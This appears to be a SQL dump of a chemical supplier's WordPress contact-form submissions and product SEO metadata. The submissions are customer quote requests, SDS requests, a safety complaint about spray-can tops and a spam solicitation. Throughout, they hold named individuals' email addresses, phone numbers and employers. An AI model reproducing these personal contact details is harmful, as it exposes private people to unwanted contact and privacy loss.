INSERT INTO `wp_postmeta` VALUES (35909, 3996, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (35910, 3996, '_field_1', 'Bhawnesh Bhardwaj'); 
INSERT INTO `wp_postmeta` VALUES (35911, 3996, '_field_10', 'Agastya Aeroworks Pvt Ltd'); 
INSERT INTO `wp_postmeta` VALUES (35912, 3996, '_field_2', 'bhawneshbhardwaj@agastyaaeroworks.in'); 
INSERT INTO `wp_postmeta` VALUES (35913, 3996, '_field_8', '(917) 503-3509'); 
INSERT INTO `wp_postmeta` VALUES (35914, 3996, '_field_3', 'Dear Sir/Madam, Good day. We require 100 Kg Krytox NRT 8904 grease for usage in Indian Defence. Please provide your best quote urgently'); 
INSERT INTO `wp_postmeta` VALUES (35915, 3996, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (35916, 3996, '_sub_id', '3996'); 
INSERT INTO `wp_postmeta` VALUES (35917, 3997, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (35918, 3997, '_seq_num', '539'); 
INSERT INTO `wp_postmeta` VALUES (35919, 3997, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (35920, 3997, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (35921, 3997, '_field_1', 'Peter Koziol'); 
INSERT INTO `wp_postmeta` VALUES (35922, 3997, '_field_10', ''); 
INSERT INTO `wp_postmeta` VALUES (35923, 3997, '_field_2', 'petesue@live.com'); 
INSERT INTO `wp_postmeta` VALUES (35924, 3997, '_field_8', '(315) 717-1514'); 
INSERT INTO `wp_postmeta` VALUES (35925, 3997, '_field_3', 'I would like to purchase your MS-530 contact renu.  Can you tell me where the nearest dealer is in the 13365 zip code?\n\nThank you'); 
INSERT INTO `wp_postmeta` VALUES (35926, 3997, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (35927, 3997, '_sub_id', '3997'); 
INSERT INTO `wp_postmeta` VALUES (35928, 3998, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (35929, 3998, '_seq_num', '540'); 
INSERT INTO `wp_postmeta` VALUES (35930, 3998, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (35931, 3998, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (35932, 3998, '_field_1', 'Stefanie Yoder'); 
INSERT INTO `wp_postmeta` VALUES (35933, 3998, '_field_10', 'mSDS Source'); 
INSERT INTO `wp_postmeta` VALUES (35934, 3998, '_field_2', 'stefanie@msdssource.biz'); 
INSERT INTO `wp_postmeta` VALUES (35935, 3998, '_field_8', '(603) 226-6655'); 
INSERT INTO `wp_postmeta` VALUES (35936, 3998, '_field_3', 'I am writing on behalf of my customer, Alaska Central Express, to obtain an SDS for one of their in-stock products. I need a safety sheet for the following: MS-122XD. Please forward this document to me at your earliest convenience. Thank you! '); 
INSERT INTO `wp_postmeta` VALUES (35937, 3998, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (35938, 3998, '_sub_id', '3998'); 
INSERT INTO `wp_postmeta` VALUES (35939, 1690, '_yoast_wpseo_linkdex', '95'); 
INSERT INTO `wp_postmeta` VALUES (35940, 1695, '_wp_old_slug', 'ms-560562'); 
INSERT INTO `wp_postmeta` VALUES (35941, 1695, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (35942, 1695, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (35943, 1695, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (35944, 1695, '_yoast_wpseo_focuskw_text_input', 'Flux Cleaner'); 
INSERT INTO `wp_postmeta` VALUES (35945, 1695, '_yoast_wpseo_focuskw', 'Flux Cleaner'); 
INSERT INTO `wp_postmeta` VALUES (35946, 1695, '_yoast_wpseo_content_score', '60'); 
INSERT INTO `wp_postmeta` VALUES (35947, 1695, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (35948, 1695, '_yoast_wpseo_linkdex', '97'); 
INSERT INTO `wp_postmeta` VALUES (35949, 1690, '_wp_old_slug', 'ms-755l-flux-remover'); 
INSERT INTO `wp_postmeta` VALUES (35950, 1697, '_wp_old_slug', 'ms-725727'); 
INSERT INTO `wp_postmeta` VALUES (35951, 1697, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (35952, 1697, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (35953, 1697, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (35954, 1697, '_yoast_wpseo_content_score', '60'); 
INSERT INTO `wp_postmeta` VALUES (35955, 1697, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (35956, 4001, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (35957, 4001, '_seq_num', '541'); 
INSERT INTO `wp_postmeta` VALUES (35958, 4001, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (35959, 4001, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (35960, 4001, '_field_1', 'Abdul Khaliq'); 
INSERT INTO `wp_postmeta` VALUES (35961, 4001, '_field_10', 'ALMDARIJ INTERNATIONAL MAR'); 
INSERT INTO `wp_postmeta` VALUES (35962, 4001, '_field_2', 'sales2@almdarij.com'); 
INSERT INTO `wp_postmeta` VALUES (35963, 4001, '_field_8', '(966) 126-0565'); 
INSERT INTO `wp_postmeta` VALUES (35964, 4001, '_field_3', 'Dear Sir,\r\n\r\n Kindly send to me quotation as soon as possible it will be closing date 13-04-2017. I will be waiting for kind response.\r\n\r\n\r\nVISCOSITY RATING:\r\nOIL,ANALYSIS STANDARDS:CALIBRATION,75 CS\r\nOIL,ANALYSIS STANDARDS:\r\nELEMENT:\r\nCALIBRATION;\r\n75 CS;\r\nADDITIONAL DATA:\r\nP N# CS-75-500 STANDARD OIL 75 BASE 500\r\nML GRAPHITE DISC ELECTRODES BOX= 500 PC\r\nS. MNF. : MILLER STEPHENSON CHEMICAL CO\r\n. A SUBSTANCE USED FOR CALIBRATION AND\r\nVERIFICATION STANDARDS FOR THE ANALYSI\r\nS OF LUBRICANT ADDITIVES, NEW AND IN-S\r\nERVICE LUBRICANTS, PETROLEUM PRODUCTS\r\nAND ORGANIC FLUIDS MATERIALS.\r\nMILLER STEPHENSON CHEMICAL CO.:\r\nP/N#CS-75-500\r\n\r\nBOT-10\r\n\r\n\r\nOIL,ANALYSIS STANDARDS:\r\nVISCOSITY RATING:\r\nCS-GT-15-100;\r\nSTANDARD/SPECIFICATION:\r\nANALYTICAL OIL FOR OIL STANDARD;\r\nADDITIONAL DATA:\r\nP N# CS-GT-15-100-200G CALIBRATION STAN\r\nDARD OIL CS-GT-15-100-200G 100PPM,250M\r\nL, 8OZ GRAPHITE DISC ELECTRODES BOX= 50\r\n0 PCS. MNF.: MILLER STEPHENSON CHEMICAL\r\nCO. CALIBRATION STANDARD OIL CS-GT-15\r\n-10-200G FOR SPECTROIL MODEL M INSTRUME\r\nNT\r\nMILLER STEPHENSON CHEMICAL CO.:\r\nP/N#CS-GT-15-100-200G\r\n\r\nBOT-05\r\n\r\n\r\nOIL,ANALYSIS STANDARDS:\r\nELEMENT:\r\nOIL CALIBRATION;\r\nVISCOSITY RATING:\r\nCS-24-100;\r\nSTANDARD/SPECIFICATION:\r\nCALIBRATION STANDARD OIL;\r\nADDITIONAL DATA:\r\nP N# CS-24-100-200G CALIBRATION STANDA\r\nRD CS24 100PPM 200G GRAPHITE DISC ELEC\r\nTRODES BOX= 500 PCS. MNF.: MILLER STE\r\nPHENSON CHEMICAL CO. CALIBRATION STAND\r\nARD OIL FOR SPECTROIL MODEL M INSTRUMEN\r\nT\r\nMILLER STEPHENSON CHEMICAL CO.:\r\nP/N#CS-24-100-200G\r\n\r\nBOT-05\r\n\r\n\r\nOIL,ANALYSIS STANDARDS:\r\nVISCOSITY RATING:\r\nSMA-900;\r\nSTANDARD/SPECIFICATION:\r\nCALIBRATION STANDARD OIL;\r\nADDITIONAL DATA:\r\nP N# SMA-900-200G STANDARD OIL SMA-900-\r\n200G MNF:MILLER STEPHENSON CHEMICAL CO\r\n. CALIBRATION STANDARD OIL FOR SPECTRO\r\nIL MODEL M INSTRUMENT\r\nMILLER STEPHENSON CHEMICAL CO.:\r\nP/N#SMA-900-200G\r\nBOT-03\r\n\r\nPIPET,LABORATORY:\r\nCAPACITY:\r\n8 ML;\r\nADDITIONAL DATA:\r\nDISPOSABLE PIPETTES TRANSFER 8 ML SIZE:\r\n4.5&quot; X 5.8&quot; P N # M99914 PIPETTES TRAN\r\nSFER 8 ML 400 BOX FOR SPECTROIL MODEL\r\nM INSTRUMENT\r\nMILLER STEPHENSON CHEMICAL CO.:\r\nP/N#M99914\r\nBOX-05\r\n\r\n\r\nCLEANER,DIRECT PURCHASE:\r\nTYPE:\r\nSOLUTION;\r\nFORM:\r\nLIQUID;\r\nCONTAINER:\r\n2OZ;\r\nADDITIONAL DATA:\r\nP N# M99915 WINDOW CLEANER SOLUTION, 2\r\nOZ. BOTTLE MNF.:MILLER STEPHENSON CHEMI\r\nCAL CO. WINDOW CLEANER 2 OZ BOTTLE FOR\r\nSPECTROIL MODEL M INSTRUMENT\r\nMILLER STEPHENSON CHEMICAL CO.:\r\nP/N#M99915\r\nBOX-20\r\n\r\n\r\nSOLVENT,DIRECT PURCHASE:\r\nTYPE:\r\nELECTRON;\r\nCOMPOSITION:\r\n22 OZ;\r\nADDITIONAL DATA:\r\nP N# M97102 ELECTRON SOLVENT, 22OZ. SPE\r\nCTRO M97102 , USA BASIC , 22 OZ SIZE: 4\r\n.5&quot; X 5.8&quot; MNF.:MILLER STEPHENSON CHEMI\r\nCAL CO.\r\nMILLER STEPHENSON CHEMICAL CO.:\r\nP/N#M97102\r\nBOX-20\r\n\r\n\r\nWATER,DIRECT PURCHASE:\r\nTYPE:\r\nHPLC GRADE 500MI;\r\nCONTAINER:\r\nBTL;\r\nADDITIONAL DATA:\r\nSTANDARD WATER HPLC GRADE 500MI P N # W\r\n1089P MILLER STEPHENSON CHEMICAL CO.\r\nMILLER STEPHENSON CHEMICAL CO.:\r\nP/N#W1089P\r\nBOT-02\r\n\r\n\r\nWATER,DIRECT PURCHASE:\r\nTYPE:\r\n5PPM 500MI;\r\nCONTAINER:\r\nBTL;\r\nADDITIONAL DATA:\r\nSTANDARD WATER 5 ELEMENT 5 PPM 500MI P\r\nN# STE005 MNF. : MILLER STEPHENSON CHEM\r\nICAL CO.\r\nMILLER STEPHENSON CHEMICAL CO.:\r\nP/N#STE005\r\nBOT-02\r\n\r\n\r\nELECTRODE,DIRECT PURCHASE:\r\nTYPE:\r\nM INSTRUMENT;\r\nADDITIONAL DATA:\r\nROUTINE MAINTENANCE KIT SPECTROIL M P\r\nN# M96013A MNF. :MILLER STEPHENSON CHEM\r\nICAL CO.\r\nMILLER STEPHENSON CHEMICAL CO.:\r\nP/N#M96013A\r\nKIT-01\r\n\r\n\r\n\r\n\r\nThanks &amp; best regards; \r\n-------------------------------\r\nAbdul Rahman Khaliq\r\nTel #. +966 12 605 6565 Ext.109\r\nFax #. +966 12 605 6767 \r\nMob #. +966 58 367 7743 \r\nsales2@almdarij.com\r\nAl Mdarij International Marketing Co.(MIMCO)\r\nJeddah, Saudi Arabia\r\n MIMCO provide Repair &amp; Maintenance service for all industrial electronic and electrical equipment.\r\n               \r\n  please consider the environment before printing this email\r\n'); 
INSERT INTO `wp_postmeta` VALUES (35965, 4001, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (35966, 4001, '_sub_id', '4001'); 
INSERT INTO `wp_postmeta` VALUES (35967, 4002, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (35968, 4002, '_seq_num', '272'); 
INSERT INTO `wp_postmeta` VALUES (35969, 4002, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (35970, 4002, '_field_12', 'Bernadette Blignault'); 
INSERT INTO `wp_postmeta` VALUES (35971, 4002, '_field_13', 'Triangle welding and engineering supplies'); 
INSERT INTO `wp_postmeta` VALUES (35972, 4002, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (35973, 4002, '_field_14', 'sales1@vaalfluidsa.com'); 
INSERT INTO `wp_postmeta` VALUES (35974, 4002, '_field_15', '076 376 8039 / 016 455 1078'); 
INSERT INTO `wp_postmeta` VALUES (35975, 4002, '_field_16', 'Good day,\r\n\r\nI want to find out how can you fit a earth leakage on a Miller Big Blue welder Serial number: KJ202682?\r\nCan you help me with a drawing or technical manual?'); 
INSERT INTO `wp_postmeta` VALUES (35976, 4002, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (35977, 4002, '_sub_id', '4002'); 
INSERT INTO `wp_postmeta` VALUES (35978, 4003, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (35979, 4003, '_seq_num', '542'); 
INSERT INTO `wp_postmeta` VALUES (35980, 4003, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (35981, 4003, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (35982, 4003, '_field_1', 'N.I.KANG'); 
INSERT INTO `wp_postmeta` VALUES (35983, 4003, '_field_10', 'BUMYONG COMPANY'); 
INSERT INTO `wp_postmeta` VALUES (35984, 4003, '_field_2', 'nadukang@hanmail.net'); 
INSERT INTO `wp_postmeta` VALUES (35985, 4003, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (35986, 4003, '_field_3', 'Dear Sir,\n\nWe are a trading company in Seoul, Korea.\nOur client asked us to provide them with your product, PTFE Release Agent MS-143TE-Red.\nIf you can sell MS-143TE-Red directly, we&#039;d like to buy it.\nIf not, please tell us how to buy.\n\nBest Regards,\n\nBYC/N.I.KANG '); 
INSERT INTO `wp_postmeta` VALUES (35987, 4003, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (35988, 4003, '_sub_id', '4003'); 
INSERT INTO `wp_postmeta` VALUES (35989, 4004, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (35990, 4004, '_seq_num', '543'); 
INSERT INTO `wp_postmeta` VALUES (35991, 4004, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (35992, 4004, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (35993, 4004, '_field_1', 'Jose María Cogollos'); 
INSERT INTO `wp_postmeta` VALUES (35994, 4004, '_field_10', 'IGT '); 
INSERT INTO `wp_postmeta` VALUES (35995, 4004, '_field_2', 'jcogollos@gtech.com'); 
INSERT INTO `wp_postmeta` VALUES (35996, 4004, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (35997, 4004, '_field_3', 'Dear Sirs.\r\nI&#039;m the responsible of an international repair center based on Madrid (Spain).\r\nI would need to purchase some units of the MS-381 HC Connector Lubricant (16 OZ.,Aerosol) and I was wondering if you have any branch at Europe so that I could avoid huge shipping costs and possible customs issues.\r\nYour prompt response would be highly appreciated\r\n\r\nThanks\r\nBest regards\r\nJose María\r\n'); 
INSERT INTO `wp_postmeta` VALUES (35998, 4004, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (35999, 4004, '_sub_id', '4004'); 
INSERT INTO `wp_postmeta` VALUES (36000, 1693, '_wp_old_slug', 'h0805ab'); 
INSERT INTO `wp_postmeta` VALUES (36001, 1693, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (36002, 1693, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (36003, 1693, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (36004, 1693, '_yoast_wpseo_focuskw_text_input', 'Flux Remover Spray'); 
INSERT INTO `wp_postmeta` VALUES (36005, 1693, '_yoast_wpseo_focuskw', 'Flux Remover Spray'); 
INSERT INTO `wp_postmeta` VALUES (36006, 1693, '_yoast_wpseo_content_score', '60'); 
INSERT INTO `wp_postmeta` VALUES (36007, 1693, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (36008, 4006, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (36009, 4006, '_seq_num', '544'); 
INSERT INTO `wp_postmeta` VALUES (36010, 4006, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (36011, 4006, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (36012, 4006, '_field_1', 'shakeel ahmed'); 
INSERT INTO `wp_postmeta` VALUES (36013, 4006, '_field_10', 'Abdul Kareem Fadl trading'); 
INSERT INTO `wp_postmeta` VALUES (36014, 4006, '_field_2', 'shakeel.ahmed@aktcorp.com'); 
INSERT INTO `wp_postmeta` VALUES (36015, 4006, '_field_8', '(056) 800-1759'); 
INSERT INTO `wp_postmeta` VALUES (36016, 4006, '_field_3', 'dear all \r\ngood day!\r\nPlease send me email, i have an enquiry for the miller stephanon product please reply me urgently '); 
INSERT INTO `wp_postmeta` VALUES (36017, 4006, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (36018, 4006, '_sub_id', '4006'); 
INSERT INTO `wp_postmeta` VALUES (36019, 4007, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (36020, 4007, '_seq_num', '273'); 
INSERT INTO `wp_postmeta` VALUES (36021, 4007, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (36022, 4007, '_field_12', 'shakeel ahmed'); 
INSERT INTO `wp_postmeta` VALUES (36023, 4007, '_field_13', 'Abdul Kareem Fadl trading'); 
INSERT INTO `wp_postmeta` VALUES (36024, 4007, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (36025, 4007, '_field_14', 'shakeel.ahmed@aktcorp.com'); 
INSERT INTO `wp_postmeta` VALUES (36026, 4007, '_field_15', '(056) 800-1759'); 
INSERT INTO `wp_postmeta` VALUES (36027, 4007, '_field_16', 'Dear sir \r\n\r\nGood day!\r\n\r\nPlease reply to my email i have a requirement of your product \r\nshakeel.ahmed@aktcorp.com \r\nMobile: 00966 56 8001759\r\n\r\nthanks \r\nshakeel'); 
INSERT INTO `wp_postmeta` VALUES (36028, 4007, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (36029, 4007, '_sub_id', '4007'); 
INSERT INTO `wp_postmeta` VALUES (36030, 4008, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (36031, 4008, '_seq_num', '545'); 
INSERT INTO `wp_postmeta` VALUES (36032, 4008, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (36033, 4008, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (36034, 4008, '_field_1', 'Karen Burton'); 
INSERT INTO `wp_postmeta` VALUES (36035, 4008, '_field_10', 'University of Louisville Hospital'); 
INSERT INTO `wp_postmeta` VALUES (36036, 4008, '_field_2', 'karenbur@ulh.org'); 
INSERT INTO `wp_postmeta` VALUES (36037, 4008, '_field_8', '(502) 562-3834'); 
INSERT INTO `wp_postmeta` VALUES (36038, 4008, '_field_3', 'I am reaching out to your company re: the MS-242N Quick Freeze cans. 1-  (specifically the change in tops on the cans)\r\nOur employees use this product daily-  multiple times a day.\r\nRecently your company changed the tops on the cans.  We have had very poor results with the new tops.  When spraying,   the top breaks  off and the spray is misdirected resulting in a dangerous situation.  One of our employees was sprayed in her eyes.    \r\nWe really like the old style tops.  We never had any problems with the old tops on the cans.   We have had issues with every can that has the new tops on it.   We have been using your product  for over 18.5 years and would like to continue using it WITH the old tops.  Please advise if there are any plans to change back to the old style tops.  I am very concerned about my employees using this new type of top based on the risk for harm when the new style tops break resulting in spray being very dangerous to our employees and clients.    I consider this new change with the tops  very unsafe to  use. \r\nPlease advise if we can order this product with the old style tops.\r\nThank you\r\nKaren Burton \r\nSupervisor of Rehab Services\r\nOccupational Therapy Department'); 
INSERT INTO `wp_postmeta` VALUES (36039, 4008, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (36040, 4008, '_sub_id', '4008'); 
INSERT INTO `wp_postmeta` VALUES (36048, 4016, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (36049, 4016, '_seq_num', '546'); 
INSERT INTO `wp_postmeta` VALUES (36050, 4016, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (36051, 4016, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (36052, 4016, '_field_1', 'LAURI BABB'); 
INSERT INTO `wp_postmeta` VALUES (36053, 4016, '_field_10', 'J ROUSEK TOY CO INC'); 
INSERT INTO `wp_postmeta` VALUES (36054, 4016, '_field_2', 'lauri@jrousek.com'); 
INSERT INTO `wp_postmeta` VALUES (36055, 4016, '_field_8', '(760) 873-8319'); 
INSERT INTO `wp_postmeta` VALUES (36056, 4016, '_field_3', 'I received our order of the MS-122AD today but I still do not have a copy of our receipt. The packing slip states that the invoice number is 240669. Could you please email the receipt to ap@jrousek.com?\r\nThank you,\r\nLauri Babb\r\nAccounts Payable\r\nJ Rousek Toy Co Inc'); 
INSERT INTO `wp_postmeta` VALUES (36057, 4016, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (36058, 4016, '_sub_id', '4016'); 
INSERT INTO `wp_postmeta` VALUES (36059, 4017, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (36060, 4017, '_seq_num', '547'); 
INSERT INTO `wp_postmeta` VALUES (36061, 4017, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (36062, 4017, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (36063, 4017, '_field_1', 'John Chung'); 
INSERT INTO `wp_postmeta` VALUES (36064, 4017, '_field_10', 'Hawaii State Department of Education, Facilities Development Branch'); 
INSERT INTO `wp_postmeta` VALUES (36065, 4017, '_field_2', 'john_ch_chung@notes.k12.hi.us'); 
INSERT INTO `wp_postmeta` VALUES (36066, 4017, '_field_8', '(808) 784-5110'); 
INSERT INTO `wp_postmeta` VALUES (36067, 4017, '_field_3', 'We are searching for a solution to protect our split system air conditioning circuit boards from bugs, lizards, and geckos.  These critters find their way onto the circuit boards and short the devices.  Would conformal coating offer protection against this?\r\n\r\nThank you\r\n'); 
INSERT INTO `wp_postmeta` VALUES (36068, 4017, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (36069, 4017, '_sub_id', '4017'); 
INSERT INTO `wp_postmeta` VALUES (36070, 4018, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (36071, 4018, '_seq_num', '548'); 
INSERT INTO `wp_postmeta` VALUES (36072, 4018, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (36073, 4018, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (36074, 4018, '_field_1', 'Eddie Hofer'); 
INSERT INTO `wp_postmeta` VALUES (36075, 4018, '_field_10', 'Rockwell Collins'); 
INSERT INTO `wp_postmeta` VALUES (36076, 4018, '_field_2', 'eddie.hofer@rockwellcollins.com'); 
INSERT INTO `wp_postmeta` VALUES (36077, 4018, '_field_8', '(319) 295-6350'); 
INSERT INTO `wp_postmeta` VALUES (36078, 4018, '_field_3', 'Wondering what the status of the material MS-143E.  Is this material currently available?  If not what replacements are available and can you provide test information on the comparison to use in qualifying the new material for our current applications?  Any help is appreciated.\r\n\r\nThanks!\r\nEddie'); 
INSERT INTO `wp_postmeta` VALUES (36079, 4018, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (36080, 4018, '_sub_id', '4018'); 
INSERT INTO `wp_postmeta` VALUES (36081, 4019, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (36082, 4019, '_seq_num', '549'); 
INSERT INTO `wp_postmeta` VALUES (36083, 4019, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (36084, 4019, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (36085, 4019, '_field_1', 'Kayla Mendoza'); 
INSERT INTO `wp_postmeta` VALUES (36086, 4019, '_field_10', 'CNS Pantex'); 
INSERT INTO `wp_postmeta` VALUES (36087, 4019, '_field_2', 'Kayla.Mendoza@cns.doe.gov'); 
INSERT INTO `wp_postmeta` VALUES (36088, 4019, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (36089, 4019, '_field_3', 'According to the website MS-122AD  is a 14 oz aerosol, but what we received says 13.5 oz on outside of the can. Can you please verify what the correct value is? \nThank you,\nKayla '); 
INSERT INTO `wp_postmeta` VALUES (36090, 4019, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (36091, 4019, '_sub_id', '4019'); 
INSERT INTO `wp_postmeta` VALUES (36092, 4020, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (36093, 4020, '_seq_num', '274'); 
INSERT INTO `wp_postmeta` VALUES (36094, 4020, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (36095, 4020, '_field_12', 'GRIL'); 
INSERT INTO `wp_postmeta` VALUES (36096, 4020, '_field_13', 'GACHES CHIMIE'); 
INSERT INTO `wp_postmeta` VALUES (36097, 4020, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (36098, 4020, '_field_14', 'mhgril@gaches.com'); 
INSERT INTO `wp_postmeta` VALUES (36099, 4020, '_field_15', '(056) 271-9595'); 
INSERT INTO `wp_postmeta` VALUES (36100, 4020, '_field_16', 'Good afternoon,\r\nCan you send me please SDS in FRENCH and ENGLISH European format about this product :\r\nMS-122AD\r\nMany thanks,\r\nBest regards,\r\nmh GRIL'); 
INSERT INTO `wp_postmeta` VALUES (36101, 4020, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (36102, 4020, '_sub_id', '4020'); 
INSERT INTO `wp_postmeta` VALUES (36103, 3989, '_wp_old_slug', 'ptfe-wire-coating'); 
INSERT INTO `wp_postmeta` VALUES (36104, 4021, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (36105, 4021, '_seq_num', '550'); 
INSERT INTO `wp_postmeta` VALUES (36106, 4021, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (36107, 4021, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (36108, 4021, '_field_1', 'Arthur James'); 
INSERT INTO `wp_postmeta` VALUES (36109, 4021, '_field_10', 'V3 Data Intel Inc'); 
INSERT INTO `wp_postmeta` VALUES (36110, 4021, '_field_2', 'arthur.james@v3dataintel.com'); 
INSERT INTO `wp_postmeta` VALUES (36111, 4021, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (36112, 4021, '_field_3', 'Hi, \r\n\r\nI just wanted to check would you be interested in trying our Opt-In Email list of Electronics Industry Professionals \r\n\r\nList consists of complete details such as: Company Name, Contact Name, Email Address, Title, Website, Address, Phone Number, FAX Number,  Employees size, Revenue ($ Mil), SIC Code and Industry. \r\n\r\nPlease let me know your target criteria to get few samples and pricing information-  \r\n \r\nTarget Industry: _____??\r\nTarget Location: ______??\r\nTarget Job Title/Designation: _____??\r\n\r\nAppreciate your time and look forward to hear from you.\r\n'); 
INSERT INTO `wp_postmeta` VALUES (36113, 4021, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (36114, 4021, '_sub_id', '4021'); 
INSERT INTO `wp_postmeta` VALUES (36115, 4022, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (36116, 4022, '_seq_num', '551'); 
INSERT INTO `wp_postmeta` VALUES (36117, 4022, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (36118, 4022, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (36119, 4022, '_field_1', 'Engr Salman Akram'); 
INSERT INTO `wp_postmeta` VALUES (36120, 4022, '_field_10', 'Stark Energy Jeddah Saudi Arabia'); 
INSERT INTO `wp_postmeta` VALUES (36121, 4022, '_field_2', 'salmanakram@outlook.com'); 
INSERT INTO `wp_postmeta` VALUES (36122, 4022, '_field_8', '(056) 109-3281'); 
INSERT INTO `wp_postmeta` VALUES (36123, 4022, '_field_3', 'Dear Sir, \r\nWe have a bid. Please Quote us your Prices of the items \r\nthanks and kind regards \r\nEngr. Salman Akram\r\n00966 561093281\r\nStark Energy TRES Jeddah Saudi Arabia'); 
INSERT INTO `wp_postmeta` VALUES (36124, 4022, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (36125, 4022, '_sub_id', '4022'); 
INSERT INTO `wp_postmeta` VALUES (36126, 4023, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (36127, 4023, '_seq_num', '552'); 
INSERT INTO `wp_postmeta` VALUES (36128, 4023, '_action', 'submit'); 
